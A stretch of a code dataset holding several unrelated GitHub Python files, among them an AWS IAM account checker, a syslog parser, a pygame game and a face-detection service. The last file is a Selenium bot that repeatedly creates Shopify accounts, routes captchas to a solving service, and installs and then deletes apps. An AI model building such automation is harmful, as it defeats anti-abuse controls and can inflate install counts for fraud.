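    for page in paginator.paginate(RoleName=role_name):
        # The paginator handles Marker/IsTruncated bookkeeping internally;
        # each page yields one batch of inline policy names.
        for policy_name in page['PolicyNames']:
            yield policy_name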
get_and_check_policy(policy_arn=named_policy['PolicyArn'], retries=0, is_named=True)\n\n if current_loop_roles % 10 != 0:\n print(f'Checked {total_loop_roles}/{total_loop_roles} roles')\n\n\ndef get_and_check_policy(retries: int, is_named: bool, role_name='', policy_name='', policy_arn=''):\n if retries == 0:\n pass\n else:\n sleep_seconds = 2 ** retries * 100 / 1000\n print(f'Waiting for {sleep_seconds}s')\n time.sleep(sleep_seconds)\n\n # noinspection PyBroadException\n try:\n if is_named:\n if len(policy_arn) < 20:\n raise ValueError(f'Policy arn \\'{policy_arn}\\' is shorter than 20 characters')\n\n policy_versions_paginator = iam_client.get_paginator(\n 'list_policy_versions') # type: mypy_boto3_iam.ListPolicyVersionsPaginator\n policy_versions_for_arn = policy_versions_paginator.paginate(PolicyArn=policy_arn)\n version: str\n for policy_versions_page in policy_versions_for_arn:\n for policy_version in policy_versions_page['Versions']:\n if policy_version['IsDefaultVersion']:\n version = policy_version['VersionId']\n break\n\n # noinspection PyUnboundLocalVariable\n default_policy_version = iam_client.get_policy_version(PolicyArn=policy_arn, VersionId=version)\n policy_document = json.dumps(default_policy_version['PolicyVersion']['Document'])\n else:\n policy = iam_client.get_role_policy(RoleName=role_name, PolicyName=policy_name)\n policy_document = json.dumps(policy['PolicyDocument'])\n\n policy_account_numbers = set(account_pattern_arn.findall(policy_document))\n if policy_account_numbers:\n print(f'Account numbers: {policy_account_numbers}')\n global account_numbers_found\n account_numbers_found = account_numbers_found | policy_account_numbers\n policy_account_numbers_suspicious = policy_account_numbers - account_numbers_allowed\n if policy_account_numbers_suspicious:\n print(f'Suspicious account numbers: {policy_account_numbers_suspicious}')\n except ValueError as e:\n raise e\n except Exception as e:\n print(e)\n retries += 1\n if is_named:\n get_and_check_policy(policy_name=policy_name, role_name=role_name, retries=retries, is_named=is_named)\n else:\n get_and_check_policy(policy_arn=policy_arn, retries=retries, is_named=is_named)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Kaputnik120/python","sub_path":"aws_foreign_account_checker/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70993197352","text":"#!/usr/bin/env python3\n\n\"\"\"\n Given a date range, find the number of connections per stream.\n\n The syslog file is parsed for some metadata and put into an sqlite3 memory DB. \n Then this DB is queried and the connections per stream is deduced. 
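    Concretely, "connections per stream" is approximated as the number of
    distinct client IPs seen per minute; this is the single GROUP BY query
    that _get_num_unique_ip_per_minute runs below:

        SELECT COUNT(DISTINCT ip), strftime('%Y-%m-%d %H:%M', inserted)
        FROM stream
        GROUP BY strftime('%Y-%m-%d %H:%M', inserted)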
\n \n\n parse(start_day, end_day) => [(connections, stream_name)]\n\n start_day: \"2020-06-22\"\n end_day: None\n connections: int\n stream_name: str\n\n\n Example:\n\n conn_per_stream = parse_db(\"2020-06-22\", None)\n\n # Only parse one day\n $ python3 parse_db.py 2020-06-22 \n []\n\"\"\"\n\nimport sqlite3\nimport mmap\nimport re\nfrom typing import List, Tuple\nimport datetime\nimport argparse \nimport os\nimport logging\nimport sys\n\nlog = logging.getLogger(__file__)\nlogging.basicConfig(\n level=logging.ERROR,\n format=f\"{__file__} [%(levelname)s] %(message)s\",\n handlers=[\n logging.FileHandler(\"/var/log/scripts.log\"),\n logging.StreamHandler(sys.stdout)\n ]\n)\n\nclass Parse:\n\n def __init__(self, start_day: str, end_day: str):\n\n self.conn = sqlite3.connect(':memory:')\n self.log_file_path = \"/var/log/syslog-ng/\"\n\n self._create_db()\n\n self.all_days = self._fill_in_days(start_day, end_day)\n\n def _fill_in_days(self, start_day: str, end_day: str) -> List[str]:\n\n end_day = end_day or start_day\n\n start_day_dt = datetime.datetime.strptime(start_day, \"%Y-%m-%d\")\n end_day_dt = datetime.datetime.strptime(end_day, \"%Y-%m-%d\")\n\n if start_day_dt > end_day_dt:\n end_day_dt, start_day_dt = start_day_dt, end_day_dt\n\n delta = end_day_dt - start_day_dt\n dd = [start_day_dt + datetime.timedelta(days=x) for x in range(delta.days + 1)]\n days = [datetime.datetime.strftime(d, \"%Y-%m-%d\") for d in dd]\n log.debug(f\"days filled in {days}\")\n return days\n\n def _get_log_file_names(self) -> str:\n\n logfiles = []\n for date in self.all_days:\n if os.path.exists(f\"{self.log_file_path}syslog-{date}.log\"):\n logfiles.append(f\"{self.log_file_path}syslog-{date}.log\")\n elif os.path.exists(f\"{self.log_file_path}syslog-{date}.log.zip\"):\n logfiles.append(f\"{self.log_file_path}syslog-{date}.log.zip\")\n\n log.debug(f\"Logs to be parsed: {logfiles}\")\n return logfiles\n\n def _create_db(self):\n try:\n with self.conn:\n self.conn.execute(\"CREATE TABLE stream (inserted timestamp, ip text, stream text, conn int)\")\n log.debug(\"Table stream created.\")\n except:\n log.debug(\"Table stream already exists. 
Skipping creation...\")\n\n def _insert_line(self, values: Tuple):\n with self.conn:\n self.conn.execute(\"INSERT INTO stream VALUES (?,?,?,?)\", values)\n \n def _get_num_unique_ip_per_minute(self):\n with self.conn:\n res = self.conn.execute(\"SELECT COUNT(DISTINCT ip), strftime('%Y-%m-%d %H:%M', inserted) FROM stream GROUP BY strftime('%Y-%m-%d %H:%M', inserted)\")\n return res.fetchall()\n\n def parse_log_to_db(self):\n comp_hls = re.compile(r\"^.* (\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}) - - \\[(.*)\\] \\\"GET \\/.*\\/hls\\/(.*_.*)\\/(.*)\\.ts HTTP\\/1\\.1\\\" (\\d\\d\\d) (\\d*) \\\".*\\\" (.*) \\\"(.*)\\\"$\")\n comp_dash = re.compile(r\"^.* (\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}) - - \\[(.*)\\] \\\"GET \\/.*\\/dash\\/(.*)\\/(.*)\\.m4a HTTP\\/1\\.1\\\" (\\d\\d\\d) (\\d*) \\\".*\\\" (.*) \\\"(.*)\\\"$\")\n \n # Copy current syslog file to temp\n # This is to ensure that we don't block the file for system writing\n # Parse over time range, and add to DB\n for log_file in self._get_log_file_names(): \n with open(log_file, 'rb') as f:\n m = mmap.mmap(f.fileno(), 0, prot=mmap.PROT_READ)\n\n line = m.readline()\n while line:\n res_hls = comp_hls.match(line.decode(\"utf-8\"))\n if res_hls:\n # Ref proper groups\n # 1: container ip, 2: stream datetime, 3: stream name, 4: fragment number, 5: http code, 6: bytes, 7: connection number, 8: forward ip\n timestamp = datetime.datetime.strptime(res_hls.group(2), '%d/%b/%Y:%H:%M:%S +0000')\n tup = (\n timestamp, \n res_hls.group(8), \n res_hls.group(3),\n res_hls.group(7) \n )\n self._insert_line(tup)\n\n res_dash = comp_dash.match(line.decode(\"utf-8\"))\n if res_dash:\n # Ref proper groups\n # 1: container ip, 2: stream datetime, 3: stream name, 4: fragment number, 5: http code, 6: bytes, 7: connection number, 8: forward ip\n timestamp = datetime.datetime.strptime(res_dash.group(2), '%d/%b/%Y:%H:%M:%S +0000')\n tup = (\n timestamp, \n res_dash.group(8), \n res_dash.group(3),\n res_dash.group(7) \n )\n self._insert_line(tup)\n\n line = m.readline()\n\n def get_connections_per_stream(self) -> List[Tuple[int, str]]:\n # Open DB and parse per stream, returning connections per stream\n if log.isEnabledFor(logging.DEBUG): \n with self.conn:\n for row in self.conn.execute(\"SELECT * FROM stream\"):\n log.debug(row)\n\n return self._get_num_unique_ip_per_minute()\n\ndef parse_db(start_day, end_day, log_level='error'):\n if log_level == 'debug':\n log.setLevel(logging.DEBUG)\n elif log_level == 'info':\n log.setLevel(logging.INFO)\n \n p = Parse(start_day, end_day)\n p.parse_log_to_db()\n c = p.get_connections_per_stream()\n log.info(c)\n return c \n\nif __name__ == \"__main__\":\n\n right_now = datetime.datetime.strftime(datetime.datetime.now(), \"%Y-%m-%d\")\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"start_day\", nargs=\"?\", default=right_now, help='2020-06-22')\n parser.add_argument(\"end_day\", nargs=\"?\", help='2020-06-23')\n parser.add_argument(\"--log-level\", dest=\"log_level\")\n args = parser.parse_args()\n\n parse_db(args.start_day, args.end_day, args.log_level)\n","repo_name":"ericlundell/nginx-webcast","sub_path":"web/parse_db.py","file_name":"parse_db.py","file_ext":"py","file_size_in_byte":6444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12912798060","text":"import sys #python标准库模块 事件循环检查\r\n\r\nimport pygame \r\nfrom bullet import Bullet\r\nfrom alien import Alien\r\nfrom random import randint\r\nfrom time import sleep\r\n\r\ndef 
check_keydown_events(event, ai_settings,screen, ship ,bullets):\r\n\tif event.key == pygame.K_RIGHT:\r\n\t\tship.moving_right = True\r\n\telif event.key == pygame.K_LEFT:\r\n\t\t#飞船左移\r\n\t\tship.moving_left = True\r\n\telif event.key == pygame.K_UP:\r\n\t\tship.moving_up = True\r\n\telif event.key == pygame.K_DOWN:\r\n\t\tship.moving_down = True\r\n\telif event.key == pygame.K_SPACE:\r\n\t\tfire_bullets(ai_settings,screen, ship ,bullets)\r\n\telif event.key == pygame.K_q:\r\n\t\tsys.exit()\r\n \r\ndef check_keyup_events(event, ship):\r\n\tif event.key == pygame.K_RIGHT:\r\n\t\tship.moving_right = False\r\n\telif event.key == pygame.K_LEFT:\t\r\n\t\tship.moving_left = False\r\n\telif event.key == pygame.K_UP:\r\n\t\tship.moving_up = False\r\n\telif event.key == pygame.K_DOWN:\r\n\t\tship.moving_down = False\r\n\r\ndef check_events(ai_settings,screen, ship ,bullets, stats, play_button,\r\n\t\taliens, scoreboard):\r\n\t\t#监听键盘鼠标事件\r\n\tfor event in pygame.event.get():\r\n\t\tif event.type == pygame.QUIT:\r\n\t\t\tsys.exit()\r\n\t\telif event.type == pygame.KEYDOWN:\r\n\t\t\tcheck_keydown_events(event,ai_settings,screen, ship ,bullets)\r\n\t\telif event.type == pygame.KEYUP:\r\n\t\t\tcheck_keyup_events(event, ship)\t\r\n\t\telif event.type == pygame.MOUSEBUTTONDOWN:\r\n\t\t\tmouse_x, mouse_y = pygame.mouse.get_pos()\r\n\t\t\tcheck_play_button(stats, play_button, mouse_x, mouse_y, aliens, \r\n\t\t\t\tbullets, ai_settings, screen, ship, scoreboard)\r\n\r\ndef check_play_button(stats, play_button, mouse_x, mouse_y, aliens, \r\n\tbullets,ai_settings, screen, ship, scoreboard):\r\n\t#点击按钮开始游戏\r\n\tbutton_clicked = play_button.rect.collidepoint(mouse_x, mouse_y)\r\n\tif button_clicked and not stats.game_active:\r\n\t\t#重置游戏设置\r\n\t\tai_settings.initialize_dymamic_settings()\r\n\t\t#隐藏光标\r\n\t\tpygame.mouse.set_visible(False)\r\n\t\t#重置上一局游戏信息\r\n\t\tstats.reset_stats()\r\n\r\n\t\tstats.game_active = True\r\n\r\n\t\t#重置记仇牌图像\r\n\t\tscoreboard.prep_score()\r\n\t\tscoreboard.prep_high_score()\r\n\t\tscoreboard.prep_level()\r\n\t\tscoreboard.prep_ships()\r\n\r\n\r\n\t\t#清空机器人和子弹列表\r\n\t\taliens.empty()\r\n\t\tbullets.empty()\r\n\r\n\t\t#创建新外星人,飞船居中\r\n\t\tcreate_fleet(ai_settings, screen, aliens, ship)\r\n\t\tship.center_ship()\r\n\r\n\r\n\r\ndef update_screen(ai_settings,screen, ship , aliens, bullets,\r\n\t\tstats, play_button, scoreboard):\r\n\t#每次循环都重绘屏幕\t\r\n\tbackground = pygame.image.load(\r\n\t\t\"E:/Python_demo/alien_invasion/pic/background.jpeg\")\r\n\tscreen.blit(background,(0,0))\r\n\r\n\t#在飞船和外星人后面重绘所有子弹\r\n\tfor bullet in bullets.sprites():\r\n\t\tbullet.draw_bullet()\r\n\r\n\r\n\tship.blitme()\r\n\taliens.draw(screen)\r\n\tscoreboard.show_score()\r\n\r\n\t#如果游戏处于非活动状态,绘制Play 按钮\r\n\tif not stats.game_active:\r\n\t\tplay_button.draw_button()\r\n\t#显示窗口\r\n\tpygame.display.flip()\r\n\r\ndef fire_bullets(ai_settings,screen, ship ,bullets):\r\n\tif len(bullets) <= ai_settings.bullet_allowde:\r\n\t\tnew_bullet = Bullet(ai_settings, screen, ship)\r\n\t\tbullets.add(new_bullet)\r\n\r\ndef revome_bullets(bullets, aliens, ai_settings, screen, ship, stats, scoreboard):\r\n\tbullets.update()\r\n\t#删除消失的子弹\r\n\tfor bullet in bullets.copy():\t\r\n\t\tif bullet.rect.bottom <= 0:\r\n\t\t\tbullets.remove(bullet)\r\n\t\t\tprint(len(bullets))\t\r\n\tcheck_bullet_alien_collisions(ai_settings, screen, ship, aliens,\r\n\t\tbullets, stats, scoreboard)\r\n\r\ndef check_bullet_alien_collisions(ai_settings, screen, ship, aliens,\r\n\t\tbullets, stats, scoreboard):\r\n\t# 检查是否有子弹击中了外星人\r\n\t# 
如果是,就删除相应的子弹和外星人\r\n\tcollisions = pygame.sprite.groupcollide(bullets, aliens, True, True)\r\n\r\n\tif collisions:\r\n\t\tfor aliens in collisions.values():\r\n\t\t\t#一次击落多个外星人时,统计之数之和\r\n\t\t\tstats.score += ai_settings.alien_points*len(aliens)\r\n\t\t\tscoreboard.prep_score()\r\n\t\tcheck_high_score(stats, scoreboard)\t\r\n\r\n\tif len(aliens) == 0:\r\n\t\tbullets.empty()\r\n\t\tai_settings.increase_speed()\r\n\r\n\t\t#提高等级\r\n\t\tstats.level += 1\r\n\t\tscoreboard.prep_level()\r\n\r\n\t\tcreate_fleet(ai_settings, screen, aliens, ship)\t\r\n\r\ndef check_high_score(stats, scoreboard):\r\n\tif stats.score > stats.high_score:\r\n\t\tstats.high_score = stats.score\r\n\t\tscoreboard.prep_high_score()\r\n\r\n\r\ndef create_fleet(ai_settings, screen, aliens, ship):\r\n\t\r\n\talien = Alien(ai_settings, screen)\r\n\t#计算每行个数\r\n\talien_num = get_number_aliens_x(ai_settings, alien.rect.width)\r\n\tnumber_rows = get_number_aliens_y(ai_settings, alien.rect.height, ship)\r\n\t#创建外星人群\r\n\tfor row_y in range(number_rows):\r\n\t\tfor num_x in range(alien_num):#(randint(-10,10)):\r\n\t\t\tcreate_alien(ai_settings, screen, aliens, num_x, row_y)\r\n\r\n\r\ndef get_number_aliens_x(ai_settings, alien_width):\r\n\t#每行外星人个数\r\n\tavailable_space_x = ai_settings.screen_width - (2*alien_width)\r\n\tnumber_available_x = int(available_space_x / (2*alien_width))\r\n\treturn number_available_x\r\n\r\ndef create_alien(ai_settings, screen, aliens, alien_num, row_num):\r\n\talien = Alien(ai_settings, screen)\r\n\talien.x = alien.rect.width + 2*alien.rect.width*alien_num\r\n\talien.y = alien.rect.height + 2*alien.rect.height*row_num\r\n\talien.rect.x = alien.x\r\n\talien.rect.y = alien.y\r\n\taliens.add(alien)\r\n\r\ndef get_number_aliens_y(ai_settings, alien_height, ship):\r\n\tavailable_space_y = ai_settings.screen_height -\\\r\n\t\t\t\t\t\t(3*alien_height) - ship.rect.height\r\n\tnumber_rows = int(available_space_y/(2*alien_height))\r\n\treturn number_rows\r\n\r\ndef update_alients(aliens, ai_settings, ship, screen, bullets, stats, scoreboard):\r\n\tcheck_fleet_edges(ai_settings, aliens)\r\n\taliens.update(ai_settings)\r\n\r\n\t#检查外星人碰撞\r\n\tif pygame.sprite.spritecollideany(ship, aliens):\r\n\t\tship_hit(aliens, ai_settings, ship, screen, bullets, stats, scoreboard)\r\n\t#检查是否有外星人到底端\r\n\tcheck_aliens_bottom(ai_settings, stats, screen, ship, aliens, bullets, scoreboard)\r\n\r\ndef check_fleet_edges(ai_settings, aliens):\r\n\t#检测是否到边缘\r\n\tfor alien in aliens.sprites():\r\n\t\tif alien.check_edges():\r\n\t\t\t#下移并反向\r\n\t\t\tchange_fleet_dirction(ai_settings, aliens)\r\n\t\t\tbreak\r\n\r\ndef change_fleet_dirction(ai_settings, aliens):\r\n\t#外星人下移并改变方向\r\n\tfor alien in aliens.sprites():\r\n\t\talien.rect.y += ai_settings.fleet_drop_speed\r\n\tai_settings.fleet_direction *= -1\r\n\r\ndef ship_hit(aliens, ai_settings, ship, screen, bullets, stats, scoreboard):\r\n\tif stats.ships_left > 0:\r\n\t\t#外星人撞飞船\r\n\t\tstats.ships_left -= 1\r\n\r\n\t\t#更新记仇牌\r\n\t\tscoreboard.prep_ships()\r\n\r\n\t\t#清空外星人列表\r\n\t\taliens.empty()\r\n\t\tbullets.empty()\r\n\t\t#创建新一批外星人\r\n\t\tcreate_fleet(ai_settings, screen, aliens, ship)\r\n\t\tship.center_ship()\r\n\t\tsleep(1.5)\r\n\telse:\r\n\t\tstats.game_active = False\r\n\t\tpygame.mouse.set_visible(True)\r\n\r\ndef check_aliens_bottom(ai_settings, stats, screen, ship, aliens, bullets, scoreboard):\r\n\t#检查是否有外星人到底端\r\n\tscreen_rect = screen.get_rect()\r\n\tfor alien in aliens.sprites():\r\n\t\tif alien.rect.bottom >= screen_rect.bottom:\r\n\t\t\tship_hit(aliens, ai_settings, ship, 
screen, bullets, stats, scoreboard)\r\n\t\t\tbreak\r\n\r\n","repo_name":"KerwinWW/alien_invasion-","sub_path":"game_functions.py","file_name":"game_functions.py","file_ext":"py","file_size_in_byte":7129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17521612895","text":"from xpcom import components, ServerException\n\nfrom koLanguageServiceBase import *\n\nclass koBullantLanguage(KoLanguageBase):\n name = \"Bullant\"\n _reg_desc_ = \"%s Language\" % name\n _reg_contractid_ = \"@activestate.com/koLanguage?language=%s;1\" \\\n % (name)\n _reg_clsid_ = \"{96A10671-291B-4000-A51E-899C933A2CA7}\"\n _reg_categories_ = [(\"komodo-language\", name)]\n\n defaultExtension = \".ant\"\n commentDelimiterInfo = {\n \"line\": [ \"#\" ],\n \"block\": [ (\"@off\", \"@on\") ],\n }\n \n def __init__(self):\n KoLanguageBase.__init__(self)\n self._style_info.update(\n _block_comment_styles = [sci_constants.SCE_C_COMMENTLINE,\n sci_constants.SCE_C_COMMENT]\n )\n \n def get_lexer(self):\n if self._lexer is None:\n self._lexer = KoLexerLanguageService()\n self._lexer.setLexer(components.interfaces.ISciMoz.SCLEX_BULLANT)\n self._lexer.setKeywords(0, self._keywords)\n return self._lexer\n\n _keywords = [\"abstract\", \"all\", \"ancestor\", \"and\", \"application\" \\\n \"assert\", \"attributes\", \"author\", \"begin\" \\\n \"callback\", \"class\", \"concrete\", \"config\", \"constants\", \"construct\", \"continue\" \\\n \"depends\", \"description\", \"downcast\", \"driver\" \\\n \"elif\", \"else\", \"ensures\", \"error\", \"exception\", \"exposure\", \"extension\" \\\n \"false\", \"fatal\", \"final\", \"function\", \"generics\", \"glyph\" \\\n \"help\", \"hidden\", \"host\", \"immutable\", \"in\", \"inherits\", \"is\" \\\n \"kernel\", \"label\", \"leave\", \"library\", \"locals\" \\\n \"mutable\", \"none\", \"not\", \"null\", \"obsolete\", \"options\", \"or\", \"other\" \\\n \"parameters\", \"peer\", \"private\", \"public\" \\\n \"raise\", \"reason\", \"restricted\", \"retry\", \"return\" \\\n \"returns\", \"rollback\", \"route\" \\\n \"security\", \"self\", \"settings\", \"severity\", \"step\" \\\n \"task\", \"test\", \"transaction\", \"true\" \\\n \"unknown\", \"varying\", \"warning\", \"when\" \\\n \"method\", \"end\", \"if\", \"until\", \"while\", \"trap\", \"case\", \"debug\", \"for\", \"foreach\", \"lock\" \\\n \"boolean\", \"character\", \"character$\", \"date\", \"date$\", \"datetime\", \"datetime$\" \\\n \"float\", \"hex$\", \"identifier\", \"identifier$\", \"integer\", \"interval\", \"interval$\" \\\n \"money\", \"money$\", \"raw\", \"raw$\", \"string\", \"tick\", \"tick$\", \"time\", \"time$\" \\\n \"version\", \"version$\"]\n\n","repo_name":"ActiveState/OpenKomodoIDE","sub_path":"src/languages/koBullantLanguage.py","file_name":"koBullantLanguage.py","file_ext":"py","file_size_in_byte":2546,"program_lang":"python","lang":"en","doc_type":"code","stars":460,"dataset":"github-code","pt":"72"} +{"seq_id":"37580620008","text":"import asyncio\nimport logging\nfrom typing import List, Tuple\n\nfrom numpy import ndarray\n\nfrom abs import BaseDownloader, BaseUrlScraper, BaseUploader, BaseFaceDetector\n\nlogger = logging.getLogger(__name__)\n\n\nclass FaceService:\n \"\"\"\n The main service logic.\n Combines all pieces together.\n \"\"\"\n\n def __init__(self,\n url_parser: BaseUrlScraper,\n downloader: BaseDownloader,\n uploader: BaseUploader,\n face_detector: BaseFaceDetector):\n self._url_parser = url_parser\n self._downloader = downloader\n 
self._uploader = uploader\n self._face_detector = face_detector\n logger.info(\"Started face service.\")\n\n async def _process_image_url(self, image_url: str) -> List[ndarray]:\n \"\"\"\n Process a single image: download and extract faces\n :param image_url: image url\n :return: list of face images\n \"\"\"\n image_bytes = await self._downloader.download(image_url)\n faces = await self._face_detector.detect_faces(image_bytes)\n return faces\n\n async def _process_image_urls(self, image_urls: List[str]) -> List[Tuple[str, List[ndarray]]]:\n \"\"\"\n Wait for all images to be processed and return all faces found\n :param image_urls: list of images urls\n :return: image url to faces tuples\n \"\"\"\n per_image_faces = await asyncio.gather(*[self._process_image_url(url) for url in image_urls],\n return_exceptions=True)\n\n # get rid of exceptions and make url->faces tuples\n url_and_faces = [(url, faces) if isinstance(faces, list) else (url, [])\n for url, faces in zip(image_urls, per_image_faces)]\n return url_and_faces\n\n async def _upload_faces(self, initial_url: str, image_url_and_faces: List[Tuple[str, List[ndarray]]]):\n tasks = []\n for image_url, image_faces in image_url_and_faces:\n for face_index, face_image in enumerate(image_faces):\n tasks.append(self._uploader.upload_image(initial_url, image_url, face_index, face_image))\n\n uploaded_flags = await asyncio.gather(*tasks, return_exceptions=True)\n faces_processed = sum(1 if isinstance(flag, bool) else 0 for flag in uploaded_flags)\n return faces_processed\n\n async def get_faces(self, url: str):\n \"\"\"\n - Downloads images attached url\n - Finds all faces on the each image\n - Saves aligned faces by using 'uploader'\n - Returns count of faces\n :param url:\n :return:\n \"\"\"\n image_urls = await self._url_parser.get_url_images(url)\n url_and_faces = await self._process_image_urls(image_urls)\n faces_processed = await self._upload_faces(url, url_and_faces)\n return faces_processed\n","repo_name":"sergeyleyko/fast_face_finder","sub_path":"app/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":2862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32592856976","text":"# coding=utf-8\nfrom __future__ import unicode_literals\nfrom sakku import Application, SakkuException, HttpException\nfrom examples.config import *\n\ntry:\n app = Application(api_key=API_KEY)\n\n # from_date = 1584200002261\n # to_date = 1584283592261\n from_date = None\n to_date = None\n save_to = None # or file path eg. 
/tmp/2664.log\n response = app.logs_export(app_id=APP_ID, from_date=from_date, to_date=to_date, save_to=save_to)\n print(response)\n # OUTPUT\n #\n\n # print(app.last_response().original_result()) # get raw result\n # print(app.last_response()) # get response handler\n\nexcept HttpException as e:\n print(\"Http Exception\\nMessage : {}\\nStatus Code : {}\\n\".format(e.message, e.status_code))\n # print(e.response_handler)\nexcept SakkuException as e:\n print(\"Sakku Exception\\nMessage : {}\".format(e.message))\n","repo_name":"FanapSoft/sakku-python-sdk","sub_path":"examples/application/08_logs_export.py","file_name":"08_logs_export.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1165336810","text":"import pandas as pd\n\n# Data filepaths\nTRAIN_FILEPATH = 'input/train.csv'\nTEST_FILEPATH = 'input/test.csv'\nSUBMISSION_FILEPATH = 'output/submission.csv'\n\n\n# Given two strings, compute their Jaccard index.\ndef jaccard(str1, str2):\n set1 = set(str1.split())\n set2 = set(str2.split())\n intersection = set1.intersection(set2)\n union = set1.union(set2)\n return len(intersection) / len(union)\n\n\n# Given an array of tweets and an array of selections to validate with, compute\n# the average Jaccard score for the whole set.\ndef validate(tweets, selects):\n n = len(tweets)\n \n total = 0\n for i in range(n):\n total += jaccard(str(tweets[i]), str(selects[i]))\n \n return total / n\n\n\ndef main():\n # Read validation data\n csv_tr = pd.read_csv(TRAIN_FILEPATH)\n tweet_va = csv_tr.iloc[:, 1] # Full tweets\n select_va = csv_tr.iloc[:, 2] # Selected texts\n \n # Read testing data\n csv_te = pd.read_csv(TEST_FILEPATH)\n id_te = csv_te.iloc[:, 0] # Tweet IDs\n tweet_te = csv_te.iloc[:, 1] # Full tweets\n \n # Get the validation score when using the whole tweet as the prediction\n validation_score = validate(tweet_va, select_va)\n print('Validation score: {0:0.5f}'.format(validation_score))\n \n # Create a submission for the test data in this fashion\n submission = {'textID': list(id_te), 'selected_text': list(tweet_te)}\n pd.DataFrame(submission).to_csv(SUBMISSION_FILEPATH, index=False)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"svadivazhagu/Tweet-Sentiment-Extraction","sub_path":"Shallow/baseline.py","file_name":"baseline.py","file_ext":"py","file_size_in_byte":1497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2064910471","text":"import sys\nimport pymysql\nimport os\nimport matplotlib.pyplot as plt\nimport numpy as np\nclass ASIC():\n def __init__(self):\n #get the environmental parameters from the unix interface\n self.username=os.getenv(\"muon_array_sql_username\")\n self.password=os.getenv(\"muon_array_sql_password\")\n self.port=int(os.getenv(\"muon_array_sql_port\"))\n self.host=os.getenv(\"muon_array_sql_host\")\n self.dbname=os.getenv(\"muon_array_sql_dbname\")\n def initial_connection(self):\n # Initialize the maria database \n try :\n self.conn=pymysql.connect(user=self.username,password=self.password,host=self.host,port=self.port,database=self.dbname)\n print(\"mariadb connected successfully!\")\n except pymysql.Error as e:\n print(\"Error connecting to MariaDB platform {}\".format(e)) \n self.cur=self.conn.cursor()\n self.cur.execute(\"use local\")\n # cur is short for cursor and conn is short for connection\n # Different from pymongo , mariadb is to convey string command that should be used by the 
command line\n def close_connection(self):\n self.conn.close()\n def get_record(self):\n record=self.cur.execute(\"select * from raw_data;\")\n result=self.cur.fetchall()\n return result\n # \"result\" stores two columns from mariadb ,which are \"time\" and \"amplitude\". \n def listlength(self):\n self.cur.execute(\"use information_schema\")\n receive=self.cur.execute(\"select table_name,table_rows from tables where TABLE_SCHEMA = 'local' AND table_name='raw_data';\")\n result=self.cur.fetchone()\n self.cur.execute(\"use local\")\n return result[1]\n # this function counts the number of records that satisfies the search criteria.\nif __name__==\"__main__\":\n asic=ASIC()\n asic.initial_connection()\n out=np.array(asic.get_record())\n y=out[:,1]\n # We only focus on the \"amplitude\" as the shape of the data is what really matters.\n length=asic.listlength()\n x=np.array([i for i in range(1,(length+1))])\n plt.figure(figsize=(100,50),dpi=100)\n plt.plot(x,y) \n # Details of the figure still needs to be added\n plt.show()\n plt.savefig('test.png')\n # We can choose to build a 'log' document for this part, in order to store all the figures temporarily.\n","repo_name":"Euchupi/muon_array_DAQ","sub_path":"draw.py","file_name":"draw.py","file_ext":"py","file_size_in_byte":2341,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"31351134234","text":"from selenium import webdriver\nfrom selenium.webdriver import ChromeOptions\nfrom selenium.webdriver.chrome.service import Service\nfrom selenium.webdriver.support.wait import WebDriverWait\n\nfrom webdriver_manager.chrome import ChromeDriverManager\n\ndef get_options():\n options = ChromeOptions()\n options.add_argument(\"--incognito\")\n options.add_argument(\"window-size=1400,1500\")\n return options\n\ndef main(cycles, api_key, shopify_apps):\n options = get_options()\n service = Service(ChromeDriverManager().install())\n print(\"\")\n for i in range(cycles):\n driver = webdriver.Chrome(service = service, options = options)\n print(\"Starting cycle #\" + str(i + 1))\n try:\n run_service(driver, api_key, shopify_apps)\n print(\"Finished cycle #\" + str(i + 1))\n except Exception as e:\n print(e)\n continue\n finally:\n print(\"\")\n\ndef standard_flow(driver, shopify_apps):\n automation.account_creation_1.main(driver)\n automation.account_creation_2.main(driver)\n\n WebDriverWait(driver, 200).until(lambda driver: driver.current_url.endswith(\"admin\"))\n admin_url = driver.current_url\n\n for shopify_app in shopify_apps:\n automation.app_page.main(driver, shopify_app)\n \n WebDriverWait(driver, 200).until(lambda driver: \"apps\" not in driver.current_url)\n if(\"choose\" in driver.current_url or True):\n automation.login_intercept.main(driver)\n automation.app_authorization.main(driver)\n \n driver.get(admin_url + \"/apps\")\n automation.delete_app.main(driver)\n\ndef captcha_flow(driver, api_key):\n automation.alternate_sign_up_form.main(driver, api_key)\n WebDriverWait(driver, 200).until(lambda driver: driver.current_url.endswith(\"/admin/account_setup\"))\n\nimport automation\n\ndef run_service(driver, api_key, shopify_apps):\n automation.home_page.main(driver)\n automation.sign_up_form.main(driver)\n WebDriverWait(driver, 200).until(lambda driver: driver.current_url != \"https://www.shopify.com/\")\n if(driver.current_url != \"https://accounts.shopify.com/store-signup/setup\"):\n captcha_flow(driver, api_key)\n standard_flow(driver, 
